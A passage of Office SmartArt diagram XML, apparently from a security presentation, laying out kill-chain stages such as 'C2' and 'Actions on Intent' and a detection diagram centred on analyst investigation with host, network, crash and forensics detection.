        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1050" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>C2</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4215670A-3B80-4C16-B2BD-C7175FF9CDF2}" type="parTrans" cxnId="{5018869D-70BE-4388-A81D-C7E7DF271A63}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E91F9D52-DD55-4CB3-AC43-BF6FB772F435}" type="sibTrans" cxnId="{5018869D-70BE-4388-A81D-C7E7DF271A63}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F27E5AE2-30A5-4E01-AAD4-AEAAA15AA541}">
      <dgm:prSet phldrT="[Text]" custT="1">
        <dgm:style>
          <a:lnRef idx="3">
            <a:schemeClr val="lt1"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="accent2"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent2"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </dgm:style>
      </dgm:prSet>
      <dgm:spPr>
        <a:xfrm>
          <a:off x="9981345" y="250315"/>
          <a:ext cx="1848397" cy="739358"/>
        </a:xfrm>
        <a:prstGeom prst="chevron">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:srgbClr val="68217A"/>
        </a:solidFill>
        <a:ln w="17145" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:shade val="95000"/>
              <a:alpha val="50000"/>
              <a:satMod val="150000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:prstDash val="solid"/>
        </a:ln>
        <a:effectLst/>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1050" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Actions on Intent</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{663F063F-B55D-4ED4-AE35-7435D7030294}" type="parTrans" cxnId="{D3727416-D79D-4406-81F7-49C7A77F4312}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A52BCBD3-8960-4E92-9361-7BAF6F0C8CA3}" type="sibTrans" cxnId="{D3727416-D79D-4406-81F7-49C7A77F4312}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BFF48EB7-5F40-4FF7-A437-E1108CED9D00}" type="pres">
      <dgm:prSet presAssocID="{488C284D-CA17-4E5D-8B69-F0C979D5F9F6}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0ECC459B-8B96-499D-9275-7BAB340E5118}" type="pres">
      <dgm:prSet presAssocID="{1B6C08AF-645B-4908-939B-1FFC3B5DB782}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C7746FB5-FE13-462F-8E63-F9E122252733}" type="pres">
      <dgm:prSet presAssocID="{D14950A8-E84E-42C6-8041-C9F78A24138F}" presName="parTxOnlySpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{414FA506-5C56-444D-B0A9-1B8F7989D9D0}" type="pres">
      <dgm:prSet presAssocID="{7FE6211E-F5FF-4D11-8752-3AB6BA59729C}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FEDC4440-0A03-4E10-9A0B-019D21486401}" type="pres">
      <dgm:prSet presAssocID="{EF6E9039-CA22-4957-B5A8-E7326CEE808A}" presName="parTxOnlySpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C1FC703B-9AA1-4234-8EE4-8C7EAEBA9873}" type="pres">
      <dgm:prSet presAssocID="{2C0FF53C-9599-4663-AA15-6F48C87592AD}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8219E40A-B9A2-47B1-96BC-7661A64222D6}" type="pres">
      <dgm:prSet presAssocID="{FF9E8DE5-4F70-4A0F-89ED-1A0A892004B8}" presName="parTxOnlySpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B4776655-5682-4618-995A-AE28AE427452}" type="pres">
      <dgm:prSet presAssocID="{9418C915-EDC0-4A7B-893A-05CA73CDA0CB}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{16E1A370-238B-4306-9551-49A74BD28131}" type="pres">
      <dgm:prSet presAssocID="{305F4BAD-FB41-457B-953B-AB6F8B94F5FD}" presName="parTxOnlySpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{25EDC683-A133-4396-BE21-B5595EBF9F7B}" type="pres">
      <dgm:prSet presAssocID="{AC3253FA-E764-4D81-BF29-38E03620DDE9}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FEE31668-27EC-4C8C-A9B1-6D84C48EB770}" type="pres">
      <dgm:prSet presAssocID="{DFD8BFC0-4F10-4AA6-B730-78592865A913}" presName="parTxOnlySpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{11B4B22A-DE7B-47AC-8873-62E8BC82FD14}" type="pres">
      <dgm:prSet presAssocID="{68D0036A-8557-461D-A4B7-73991B06DF41}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="5" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{184798DB-8C6E-4A48-AE03-924FABD3E07B}" type="pres">
      <dgm:prSet presAssocID="{E91F9D52-DD55-4CB3-AC43-BF6FB772F435}" presName="parTxOnlySpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C3A69038-0147-4BAF-BB50-8D7B8431FC72}" type="pres">
      <dgm:prSet presAssocID="{F27E5AE2-30A5-4E01-AAD4-AEAAA15AA541}" presName="parTxOnly" presStyleLbl="node1" presStyleIdx="6" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{C42F2E38-ADCA-4F5E-9218-D1C1C71B2F5E}" type="presOf" srcId="{488C284D-CA17-4E5D-8B69-F0C979D5F9F6}" destId="{BFF48EB7-5F40-4FF7-A437-E1108CED9D00}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{613BE18B-76C7-4303-9AFF-AE47EDAF6B3E}" srcId="{488C284D-CA17-4E5D-8B69-F0C979D5F9F6}" destId="{9418C915-EDC0-4A7B-893A-05CA73CDA0CB}" srcOrd="3" destOrd="0" parTransId="{BA81A173-EAD5-4BE8-A42E-48C593469CA8}" sibTransId="{305F4BAD-FB41-457B-953B-AB6F8B94F5FD}"/>
    <dgm:cxn modelId="{077EE0BB-0353-443C-AD0A-02C740B5E389}" type="presOf" srcId="{7FE6211E-F5FF-4D11-8752-3AB6BA59729C}" destId="{414FA506-5C56-444D-B0A9-1B8F7989D9D0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{D3727416-D79D-4406-81F7-49C7A77F4312}" srcId="{488C284D-CA17-4E5D-8B69-F0C979D5F9F6}" destId="{F27E5AE2-30A5-4E01-AAD4-AEAAA15AA541}" srcOrd="6" destOrd="0" parTransId="{663F063F-B55D-4ED4-AE35-7435D7030294}" sibTransId="{A52BCBD3-8960-4E92-9361-7BAF6F0C8CA3}"/>
    <dgm:cxn modelId="{EA97BDA4-4C7F-440F-B6D3-32ACD99EA954}" type="presOf" srcId="{F27E5AE2-30A5-4E01-AAD4-AEAAA15AA541}" destId="{C3A69038-0147-4BAF-BB50-8D7B8431FC72}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{452107F8-84F3-4D6A-BB68-36C29BA3BD18}" type="presOf" srcId="{9418C915-EDC0-4A7B-893A-05CA73CDA0CB}" destId="{B4776655-5682-4618-995A-AE28AE427452}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{4CE96D5F-CA9D-487B-9B92-BB6315B48AE7}" srcId="{488C284D-CA17-4E5D-8B69-F0C979D5F9F6}" destId="{1B6C08AF-645B-4908-939B-1FFC3B5DB782}" srcOrd="0" destOrd="0" parTransId="{85BE8E1F-C0F2-42DD-A617-C789BA6D2C2A}" sibTransId="{D14950A8-E84E-42C6-8041-C9F78A24138F}"/>
    <dgm:cxn modelId="{68FB6A46-DD11-480D-AE05-B1AF739F46FC}" type="presOf" srcId="{68D0036A-8557-461D-A4B7-73991B06DF41}" destId="{11B4B22A-DE7B-47AC-8873-62E8BC82FD14}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{C9FE8549-718A-4A32-B521-189ED746EECE}" type="presOf" srcId="{1B6C08AF-645B-4908-939B-1FFC3B5DB782}" destId="{0ECC459B-8B96-499D-9275-7BAB340E5118}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{9617FEBA-F5DE-4984-A2BE-E91FAF371391}" srcId="{488C284D-CA17-4E5D-8B69-F0C979D5F9F6}" destId="{2C0FF53C-9599-4663-AA15-6F48C87592AD}" srcOrd="2" destOrd="0" parTransId="{C56BBFC8-FE01-4B07-A630-C11D4837432A}" sibTransId="{FF9E8DE5-4F70-4A0F-89ED-1A0A892004B8}"/>
    <dgm:cxn modelId="{4068BB73-74DA-499A-9E01-83EF1B141CE6}" srcId="{488C284D-CA17-4E5D-8B69-F0C979D5F9F6}" destId="{AC3253FA-E764-4D81-BF29-38E03620DDE9}" srcOrd="4" destOrd="0" parTransId="{644DABE2-7650-451F-91B5-0F34EE0FE9BF}" sibTransId="{DFD8BFC0-4F10-4AA6-B730-78592865A913}"/>
    <dgm:cxn modelId="{5018869D-70BE-4388-A81D-C7E7DF271A63}" srcId="{488C284D-CA17-4E5D-8B69-F0C979D5F9F6}" destId="{68D0036A-8557-461D-A4B7-73991B06DF41}" srcOrd="5" destOrd="0" parTransId="{4215670A-3B80-4C16-B2BD-C7175FF9CDF2}" sibTransId="{E91F9D52-DD55-4CB3-AC43-BF6FB772F435}"/>
    <dgm:cxn modelId="{E6298350-4808-4431-83D1-DFC66BE781AE}" type="presOf" srcId="{AC3253FA-E764-4D81-BF29-38E03620DDE9}" destId="{25EDC683-A133-4396-BE21-B5595EBF9F7B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{960F4F01-5307-4D22-9904-529D536F3B93}" srcId="{488C284D-CA17-4E5D-8B69-F0C979D5F9F6}" destId="{7FE6211E-F5FF-4D11-8752-3AB6BA59729C}" srcOrd="1" destOrd="0" parTransId="{C44F43F7-8648-4846-8D8F-A8BBC38371C7}" sibTransId="{EF6E9039-CA22-4957-B5A8-E7326CEE808A}"/>
    <dgm:cxn modelId="{0FEA1905-3956-4B39-B6CB-361ACC1EC944}" type="presOf" srcId="{2C0FF53C-9599-4663-AA15-6F48C87592AD}" destId="{C1FC703B-9AA1-4234-8EE4-8C7EAEBA9873}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{38B46E24-5EF6-4830-BD2E-5897918E1C1E}" type="presParOf" srcId="{BFF48EB7-5F40-4FF7-A437-E1108CED9D00}" destId="{0ECC459B-8B96-499D-9275-7BAB340E5118}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{4620BA2C-910E-4825-B16A-0A76FBB12F52}" type="presParOf" srcId="{BFF48EB7-5F40-4FF7-A437-E1108CED9D00}" destId="{C7746FB5-FE13-462F-8E63-F9E122252733}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{61FCAB0C-AAC1-4E4C-9B98-44E902DF5379}" type="presParOf" srcId="{BFF48EB7-5F40-4FF7-A437-E1108CED9D00}" destId="{414FA506-5C56-444D-B0A9-1B8F7989D9D0}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{021D61FF-A543-4135-A1C0-19557D5A3A57}" type="presParOf" srcId="{BFF48EB7-5F40-4FF7-A437-E1108CED9D00}" destId="{FEDC4440-0A03-4E10-9A0B-019D21486401}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{8314A56E-4955-4DE3-B84E-93F54151AB64}" type="presParOf" srcId="{BFF48EB7-5F40-4FF7-A437-E1108CED9D00}" destId="{C1FC703B-9AA1-4234-8EE4-8C7EAEBA9873}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{74D45618-AA2A-4674-819B-3DE250EEC1EE}" type="presParOf" srcId="{BFF48EB7-5F40-4FF7-A437-E1108CED9D00}" destId="{8219E40A-B9A2-47B1-96BC-7661A64222D6}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{4AEDFCCA-D82F-4047-8BEF-A968451EA3B1}" type="presParOf" srcId="{BFF48EB7-5F40-4FF7-A437-E1108CED9D00}" destId="{B4776655-5682-4618-995A-AE28AE427452}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{F532F74F-E7EF-4091-AF11-AD2E039B9CEC}" type="presParOf" srcId="{BFF48EB7-5F40-4FF7-A437-E1108CED9D00}" destId="{16E1A370-238B-4306-9551-49A74BD28131}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{DB1D96FA-F7FB-4F94-80D0-CEB68A81B104}" type="presParOf" srcId="{BFF48EB7-5F40-4FF7-A437-E1108CED9D00}" destId="{25EDC683-A133-4396-BE21-B5595EBF9F7B}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{AAA4C21D-AC65-4B7B-BDAE-B7B5E4FDAE7B}" type="presParOf" srcId="{BFF48EB7-5F40-4FF7-A437-E1108CED9D00}" destId="{FEE31668-27EC-4C8C-A9B1-6D84C48EB770}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{00A41C3E-18D7-4B39-AEB5-CE91293ED549}" type="presParOf" srcId="{BFF48EB7-5F40-4FF7-A437-E1108CED9D00}" destId="{11B4B22A-DE7B-47AC-8873-62E8BC82FD14}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{A7C4B8FB-5A9F-47E7-BF3E-420D68EF1F34}" type="presParOf" srcId="{BFF48EB7-5F40-4FF7-A437-E1108CED9D00}" destId="{184798DB-8C6E-4A48-AE03-924FABD3E07B}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron1"/>
    <dgm:cxn modelId="{863A4C93-3C3F-44A3-8E0B-137B8AD8D543}" type="presParOf" srcId="{BFF48EB7-5F40-4FF7-A437-E1108CED9D00}" destId="{C3A69038-0147-4BAF-BB50-8D7B8431FC72}"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D1D572-9F76-4525-B693-38A4923999AC}"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81FCF048-0F9B-49D9-B659-F9172DA4BF36}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Analyst Investigation</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1A09333E-8633-4B68-AE56-55C55C684DA1}" type="parTrans" cxnId="{8E5AD4D9-E54E-41A9-8D32-1840C8C17DB7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1F105BC0-A793-4F9F-AAA9-DD9AE3F8BBDA}" type="sibTrans" cxnId="{8E5AD4D9-E54E-41A9-8D32-1840C8C17DB7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{111BEDBA-40AC-46FB-808B-9D918A10E313}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Host detection</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C3D22295-625D-4CF8-9E60-BBF96BB07E6D}" type="parTrans" cxnId="{4EF0FE35-2EDC-4029-ABB4-BA469242273C}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="00B0F0"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US">
            <a:highlight>
              <a:srgbClr val="0072C6"/>
            </a:highlight>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8C7FCA23-46DD-4D5B-82A2-50485AD4FA9C}" type="sibTrans" cxnId="{4EF0FE35-2EDC-4029-ABB4-BA469242273C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6A06119E-26A2-482A-8C7F-6996594F85DE}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Network Detection</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{539F5590-57E8-4B18-B771-0357E8076C22}" type="parTrans" cxnId="{827452D4-E81C-4738-AC7B-0121B34C47AA}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="00B0F0"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US">
            <a:highlight>
              <a:srgbClr val="0072C6"/>
            </a:highlight>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{849B1357-0297-4DDB-B044-99D790E9B026}" type="sibTrans" cxnId="{827452D4-E81C-4738-AC7B-0121B34C47AA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A5C49694-4EBD-4654-A6FC-14C5E1A6C7CC}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Crash Detection</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{17157F98-F25A-4E15-B047-0E66D631D9E7}" type="parTrans" cxnId="{EAF392A4-AB36-4855-8B17-456B7961F603}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="00B0F0"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US">
            <a:highlight>
              <a:srgbClr val="0072C6"/>
            </a:highlight>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B701EFB1-83CA-4D44-B701-D2AFE0213FF5}" type="sibTrans" cxnId="{EAF392A4-AB36-4855-8B17-456B7961F603}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{89CB1844-AB0E-4731-B39A-B08F7A7BD86F}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Forensics Detection</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AB3196C8-4853-4720-B740-76F5597A7A01}" type="parTrans" cxnId="{9E4C09C1-9770-4604-87A2-1EEF44AD7FCA}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="00B0F0"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US">
            <a:highlight>
              <a:srgbClr val="0072C6"/>
            </a:highlight>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6C965B05-A7CB-4A6B-AE01-B2F12EDFEA70}" type="sibTrans" cxnId="{9E4C09C1-9770-4604-87A2-1EEF44AD7FCA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EE506720-BF1B-41DF-97A7-332D26E50661}" type="pres">
      <dgm:prSet presAssocID="{74D1D572-9F76-4525-B693-38A4923999AC}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:dir/>
          <dgm:animLvl val="ctr"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E70D8E72-9690-46BF-B680-66EAED33EA0E}" type="pres">
      <dgm:prSet presAssocID="{81FCF048-0F9B-49D9-B659-F9172DA4BF36}" presName="centerShape" presStyleLbl="node0" presStyleIdx="0" presStyleCnt="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BC10E8FF-321B-463A-9CB2-70C66FA5C07E}" type="pres">
      <dgm:prSet presAssocID="{C3D22295-625D-4CF8-9E60-BBF96BB07E6D}" presName="parTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{400D6494-5FCC-4CBC-B7A1-0EB9EB83F3F5}" type="pres">
      <dgm:prSet presAssocID="{C3D22295-625D-4CF8-9E60-BBF96BB07E6D}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2A6B2FF6-8E0D-4631-85E6-BFCDE0580A9B}" type="pres">
      <dgm:prSet presAssocID="{111BEDBA-40AC-46FB-808B-9D918A10E313}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{930BE532-D82A-423C-85D1-F308C367B3A4}" type="pres">
      <dgm:prSet presAssocID="{539F5590-57E8-4B18-B771-0357E8076C22}" presName="parTrans" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E1FBD15E-8FE9-4D84-B632-C996B610F2ED}" type="pres">
      <dgm:prSet presAssocID="{539F5590-57E8-4B18-B771-0357E8076C22}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{94646236-8DBB-47F2-9815-7715198FC7E8}" type="pres">
      <dgm:prSet presAssocID="{6A06119E-26A2-482A-8C7F-6996594F85DE}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DB06E63D-2704-4A93-9317-C0839AAEE4FB}" type="pres">
      <dgm:prSet presAssocID="{17157F98-F25A-4E15-B047-0E66D631D9E7}" presName="parTrans" presStyleLbl="sibTrans2D1" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C894399B-28B0-42AC-BB26-49BC912E734E}" type="pres">
      <dgm:prSet presAssocID="{17157F98-F25A-4E15-B047-0E66D631D9E7}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A94E3F30-E231-45C5-A30F-915289D7FF03}" type="pres">
      <dgm:prSet presAssocID="{A5C49694-4EBD-4654-A6FC-14C5E1A6C7CC}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E4DD00FF-EC35-45B3-8204-392771E5CDCC}" type="pres">
